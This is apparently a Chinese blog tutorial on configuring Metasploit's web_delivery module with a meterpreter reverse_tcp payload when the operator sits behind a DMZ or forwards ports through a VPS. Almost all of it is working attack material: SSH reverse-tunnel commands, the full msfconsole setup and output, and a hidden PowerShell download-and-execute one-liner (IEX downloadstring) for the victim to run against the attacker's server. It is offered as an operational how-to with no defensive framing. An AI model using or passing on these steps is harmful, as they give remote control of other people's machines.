欢迎光临
我们一直在努力

DMZ下使用web_delivery 介绍

之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的地址为内网地址,即不可能获取到会话,查看详细配置信息,发现存在reverselistenerbindaddress 设置选项,解决了此问题,当然,此参数也适用于用vps转发端口使用本地msf的情况。详细配置如下:

使用vps转发 8081 端口到本地8081端口 (web_delivery服务端口)


ssh -N -R 8081:ip:8081 user@ip

使用vps转发 6666 端口到本地6666端口 (web_delivery payload 监听端口)


ssh -N -R 6666:ip:6666 user@ip

msf开启并配置web_delivery


msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 2 target => 2 msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(web_delivery) > set SRVPORT 8081 SRVPORT => 8081 msf exploit(web_delivery) > set URIPATH / URIPATH => / msf exploit(web_delivery) > set lhost ip  #外网ip地址 lhost => ip msf exploit(web_delivery) > set lport 6666 lport => 6666 msf exploit(web_delivery) > set reverselistenerbindaddress 192.168.2.100 #内网ip地址 reverselistenerbindaddress => 192.168.2.100 msf exploit(web_delivery) > exploit [*] Exploit running as background job.  [*] Started reverse TCP handler on 192.168.2.100:6666 msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/ [*] Local IP: http://192.168.2.100:8081/ [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

客户端执行:

powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

内网msf获取meterpreter会话。

DMZ情形下,不需要做端口转发,只需要把lhost设置为外网ip地址,reverselistenerbindaddress 设置为内网ip地址即可。

未经允许不得转载:杂术馆 » DMZ下使用web_delivery 介绍
分享到: 更多 (0)